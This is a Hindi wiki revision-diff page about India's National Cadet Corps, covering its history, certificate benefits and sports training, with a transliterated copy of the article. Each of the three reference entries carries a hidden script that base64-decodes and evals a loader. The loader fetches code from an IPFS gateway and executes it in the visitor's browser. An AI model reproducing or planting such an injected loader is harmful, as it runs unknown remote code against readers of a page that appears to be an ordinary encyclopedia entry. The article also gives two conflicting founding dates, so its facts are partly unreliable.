Difference between revisions of "राष्ट्रीय कैडेट कोर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 31: Line 31:
 
'''राष्ट्रीय कैडेट कोर''' ([[अंग्रेज़ी]]: ''National Cadet Corps''-NCC) विश्व का सबसे बड़ा और वर्दीधारी युवा संगठन है। [[नई दिल्ली]] में यह अपने मुख्यालय के साथ एक भारतीय सैन्य कैडेट कोर है। यह स्वैच्छिक आधार पर स्कूल और कॉलेज के छात्रों के लिए खुला है। '''राष्ट्रीय कैडेट कोर दिवस''' प्रत्येक वर्ष [[नवम्बर]] माह के चौथे [[रविवार]] को मनाया जाता है।
 
'''राष्ट्रीय कैडेट कोर''' ([[अंग्रेज़ी]]: ''National Cadet Corps''-NCC) विश्व का सबसे बड़ा और वर्दीधारी युवा संगठन है। [[नई दिल्ली]] में यह अपने मुख्यालय के साथ एक भारतीय सैन्य कैडेट कोर है। यह स्वैच्छिक आधार पर स्कूल और कॉलेज के छात्रों के लिए खुला है। '''राष्ट्रीय कैडेट कोर दिवस''' प्रत्येक वर्ष [[नवम्बर]] माह के चौथे [[रविवार]] को मनाया जाता है।
 
==भारत में एन.सी.सी.==
 
==भारत में एन.सी.सी.==
'राष्ट्रीय कैडेट कोर' (एन.सी.सी.) की उत्पत्ति 'विश्वविद्यालय कोर' में हुई, जो 'भारतीय रक्षा अधिनियम, 1917' के तहत सेना की कमी को पूरा करने के उद्देश्य के साथ था। [[1920]] में, जब 'भारतीय प्रादेशिक अधिनियम पारित' हुआ था, 'विश्वविद्यालय कोर' को 'विश्वविद्यालय प्रशिक्षण कोर' (यू.टी.सी.) के नाम से बदल दिया गया। वर्ष [[1942]] में यू.टी.सी. को 'विश्वविद्यालय अधिकारी प्रशिक्षण काँपरेशन' (यू.ओ.टी.सी.) के रूप में पुनः नामकरण किया गया। युवा लड़के और लड़कियों को प्रशिक्षित करने, सुरक्षा बल सहित जीवन के सभी क्षेत्र में बेहतर नागरिक बनाने और हमारे महान देश के लिए भविष्य के बेहतर नेता बनाने के लिए, राष्ट्रीय स्तर पर एक युवा संगठन बनाने की जरूरत हमारे नेताओं का यही उचित एहसास था। देश के प्रथम [[प्रधानमंत्री]] [[जवाहर लाल नेहरू|पंडित जवाहर लाल नेहरू]] के आदेश पर [[1946]] में पंडित एच. एन. कुंजरू के अधीन एक समिति स्थापित हुई। इस प्रकार 'राष्ट्रीय कैडेट कोर' [[16 जुलाई]], [[1948]] को 'रक्षा मंत्रालय' के अंतर्गत 1948 में एन.सी.सी. के XXXI एक्ट के तहत अस्तित्व में आया।<ref>{{cite web |url= http://www.delhi.gov.in/wps/wcm/connect/doit_ncc/NCC+Hindi/Home/Genisis+Of+NCC|title= एनसीसी की उत्पत्ति|accessmonthday= 25 नवम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher=आधिकारिक वेबसाइट, दिल्ली सरकार|language= हिन्दी}}</ref>
+
एन.सी.सी. सबसे पहले [[जर्मनी]] में 1666 में शुरू किया गया था। 'राष्ट्रीय कैडेट कोर' (एन.सी.सी.) की उत्पत्ति 'विश्वविद्यालय कोर' में हुई, जो 'भारतीय रक्षा अधिनियम, 1917' के तहत सेना की कमी को पूरा करने के उद्देश्य के साथ था। [[1920]] में, जब 'भारतीय प्रादेशिक अधिनियम पारित' हुआ था, 'विश्वविद्यालय कोर' को 'विश्वविद्यालय प्रशिक्षण कोर' (यू.टी.सी.) के नाम से बदल दिया गया। वर्ष [[1942]] में यू.टी.सी. को 'विश्वविद्यालय अधिकारी प्रशिक्षण काँपरेशन' (यू.ओ.टी.सी.) के रूप में पुनः नामकरण किया गया। युवा लड़के और लड़कियों को प्रशिक्षित करने, सुरक्षा बल सहित जीवन के सभी क्षेत्र में बेहतर नागरिक बनाने और हमारे महान देश के लिए भविष्य के बेहतर नेता बनाने के लिए, राष्ट्रीय स्तर पर एक युवा संगठन बनाने की जरूरत हमारे नेताओं का यही उचित एहसास था। देश के प्रथम [[प्रधानमंत्री]] [[जवाहर लाल नेहरू|पंडित जवाहर लाल नेहरू]] के आदेश पर [[1946]] में पंडित एच. एन. कुंजरू के अधीन एक समिति स्थापित हुई। इस प्रकार 'राष्ट्रीय कैडेट कोर' [[16 जुलाई]], [[1948]] को 'रक्षा मंत्रालय' के अंतर्गत 1948 में एन.सी.सी. के XXXI एक्ट के तहत अस्तित्व में आया।<ref>{{cite web |url= http://www.delhi.gov.in/wps/wcm/connect/doit_ncc/NCC+Hindi/Home/Genisis+Of+NCC|title= एनसीसी की उत्पत्ति|accessmonthday= 25 नवम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher=आधिकारिक वेबसाइट, दिल्ली सरकार|language= हिन्दी}}</ref>
 +
====प्रमाणपत्र का महत्त्व====
 +
राष्ट्रीय कैडेट कोर के जरिए विशेष भर्ती योजना के तहत स्नातक उत्तीर्ण वे विद्यार्थी जो एन.सी.सी. का 'बी' या 'सी' प्रमाणपत्र प्राप्त कर लेते हैं, वे देश की सुरक्षा से सम्बंधित होने वाली भर्तियों में आवेदन कर सकते हैं। उन्हें इन भर्तियों में अतिरिक्त अंक भी प्रदान किये जाते हैं। एन.सी.सी. कैडेट 'सी' सर्टिफिकेट में 'ए' या 'बी' ग्रेड मिलने के बाद कई प्रकार की छूट के अधिकारी हो जाते हैं। इस सर्टिफिकेट के बाद कैडेट भारतीय सेना में भर्ती होने के लिए लिखित परीक्षा दिए बिना ही सीधे एस.एस.बी. इंटरव्यू दे सकते हैं। एन.सी.सी. का कैडेट तय मानकों के बाद [[भारतीय सेना]], [[नौसेना]] और [[वायु सेना]] की भर्ती के लिए आवेदन कर सकता है।
 +
==राष्ट्रीय खेलों में हिस्सा==
 +
एन.सी.सी. के प्रशिक्षण शिविरों के दौरान कैडेटों को फुटबाल, वॉलीबॉल, [[कबड्डी]] और फ़ायरिंग के गुण भी सिखाए जाते हैं। जो कैडेट अच्छा प्रदर्शन करता है, वह राज्य स्तर पर अपनी प्रतिभा का लोहा मनाने के बाद [[राष्ट्रीय खेल|राष्ट्रीय खेलों]] में प्रतिभाग कर बुलंदियों को छू सकता है।<ref>{{cite web |url= http://m.amarujala.com/news/states/uttarakhand/tehri/Tehri-74460-16/|title= युवाओं के सपनों को उड़ान देगी एनसीसी|accessmonthday=25 नवम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher=अमर उजाला.कॉम|language= हिन्दी}}</ref>
 +
 
 +
और भी हैं विकल्प
 
==मुख्य बिंदु==
 
==मुख्य बिंदु==
 
*राष्ट्रीय कैडेट कोर की स्‍थापना [[16 अप्रैल]], [[1948]] में की गई थी।
 
*राष्ट्रीय कैडेट कोर की स्‍थापना [[16 अप्रैल]], [[1948]] में की गई थी।

Revision as of 12:58, 25 November 2014

rashtriy kaidet kor
vivaran 'rashtriy kaidet kor' vishv ka sabase b da aur vardidhari yuva sangathan hai. yah svaichchhik adhar par skool aur k aaulej ke chhatroan ke lie khula hai.
sthapana 16 aprail, 1948
adarsh vaky ekata aur anushasan
rashtriy kaidet kor divas pratyek varsh navambar mah ke chauthe ravivar ko 'rashtriy kaidet kor divas' manaya jata hai.
any janakari enasisi ke madhyam se uchch vidyalayoan, mahavidyalayoan aur poore bharat mean vishvavidyalayoan ke kaidetoan ko chhote hathiyaroan aur pared mean buniyadi sainy prashikshan pradan karata hai.
bahari k diyaan adhikarik vebasait

rashtriy kaidet kor (aangrezi: National Cadet Corps-NCC) vishv ka sabase b da aur vardidhari yuva sangathan hai. nee dilli mean yah apane mukhyalay ke sath ek bharatiy sainy kaidet kor hai. yah svaichchhik adhar par skool aur k aaulej ke chhatroan ke lie khula hai. rashtriy kaidet kor divas pratyek varsh navambar mah ke chauthe ravivar ko manaya jata hai.

bharat mean en.si.si.

en.si.si. sabase pahale jarmani mean 1666 mean shuroo kiya gaya tha. 'rashtriy kaidet kor' (en.si.si.) ki utpatti 'vishvavidyalay kor' mean huee, jo 'bharatiy raksha adhiniyam, 1917' ke tahat sena ki kami ko poora karane ke uddeshy ke sath tha. 1920 mean, jab 'bharatiy pradeshik adhiniyam parit' hua tha, 'vishvavidyalay kor' ko 'vishvavidyalay prashikshan kor' (yoo.ti.si.) ke nam se badal diya gaya. varsh 1942 mean yoo.ti.si. ko 'vishvavidyalay adhikari prashikshan kaanpareshan' (yoo.o.ti.si.) ke roop mean punah namakaran kiya gaya. yuva l dake aur l dakiyoan ko prashikshit karane, suraksha bal sahit jivan ke sabhi kshetr mean behatar nagarik banane aur hamare mahan desh ke lie bhavishy ke behatar neta banane ke lie, rashtriy star par ek yuva sangathan banane ki jaroorat hamare netaoan ka yahi uchit ehasas tha. desh ke pratham pradhanamantri pandit javahar lal neharoo ke adesh par 1946 mean pandit ech. en. kuanjaroo ke adhin ek samiti sthapit huee. is prakar 'rashtriy kaidet kor' 16 julaee, 1948 ko 'raksha mantralay' ke aantargat 1948 mean en.si.si. ke XXXI ekt ke tahat astitv mean aya.[1]

pramanapatr ka mahattv

rashtriy kaidet kor ke jarie vishesh bharti yojana ke tahat snatak uttirn ve vidyarthi jo en.si.si. ka 'bi' ya 'si' pramanapatr prapt kar lete haian, ve desh ki suraksha se sambandhit hone vali bhartiyoan mean avedan kar sakate haian. unhean in bhartiyoan mean atirikt aank bhi pradan kiye jate haian. en.si.si. kaidet 'si' sartiphiket mean 'e' ya 'bi' gred milane ke bad kee prakar ki chhoot ke adhikari ho jate haian. is sartiphiket ke bad kaidet bharatiy sena mean bharti hone ke lie likhit pariksha die bina hi sidhe es.es.bi. iantaravyoo de sakate haian. en.si.si. ka kaidet tay manakoan ke bad bharatiy sena, nausena aur vayu sena ki bharti ke lie avedan kar sakata hai.

rashtriy kheloan mean hissa

en.si.si. ke prashikshan shiviroan ke dauran kaidetoan ko phutabal, v aaulib aaul, kabaddi aur fayariang ke gun bhi sikhae jate haian. jo kaidet achchha pradarshan karata hai, vah rajy star par apani pratibha ka loha manane ke bad rashtriy kheloan mean pratibhag kar bulandiyoan ko chhoo sakata hai.[2]

aur bhi haian vikalp

mukhy biandu

  • rashtriy kaidet kor ki sh‍thapana 16 aprail, 1948 mean ki gee thi.
  • yah anushasit aur deshabhakt nagarikoan mean desh ke yuvaoan ko sanvarane mean lage hue sena, nausena aur vayu sena ka ek trikoniy seva sangathan hai.
  • bharat mean rashtriy kaidet kor ke madhyam se uchch vidyalayoan, mahavidyalayoan aur poore bharat mean vishvavidyalayoan ke kaidetoan ko chhote hathiyaroan aur pared mean buniyadi sainy prashikshan pradan karata hai.
  • bharat ke sabhi rajh‍yoan ki rajadhaniyoan mean enasisi ka sh‍thapana divas manaya jata hai, jisamean kaidet march pash‍t, saansh‍kritik karyakram aur samajik vikas ke karyakramoan mean hish‍sa lete haian.
  • enasisi samaj kalh‍yan ke karyoan mean bhi age raha hai. atit mean anek gatividhiyoan ke jarie aur khel-kood mean bhi vah age raha hai tatha nishanebaji aur ghu dasavari mean rashh‍triy sh‍tar par anek samh‍man arjit kiye haian.[3]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. enasisi ki utpatti (hindi) adhikarik vebasait, dilli sarakar. abhigaman tithi: 25 navambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. yuvaoan ke sapanoan ko u dan degi enasisi (hindi) amar ujala.k aaum. abhigaman tithi: 25 navambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  3. enasisi ne manaya sh‍thapana divas (hindi) svatantr avaj. abhigaman tithi: 22 navambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh